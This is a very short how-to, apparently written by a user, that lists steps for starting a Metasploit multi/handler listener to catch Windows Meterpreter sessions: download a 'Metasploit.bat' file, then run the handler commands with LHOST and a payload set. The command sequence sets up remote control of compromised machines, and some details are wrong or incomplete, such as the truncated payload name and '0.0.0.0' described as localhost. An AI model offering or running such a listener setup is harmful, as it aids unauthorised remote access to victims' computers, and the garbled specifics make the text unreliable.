Steps:
1. Download and start Metasploit.bat (contains scripts which will form a user interface into CMD)
2. Choose options
3. Introduce these commands to create the desired program: use multi/handler; set LHOST 0.0.0.0 (localhost); set payload windows/meterpreter; exploit -j.
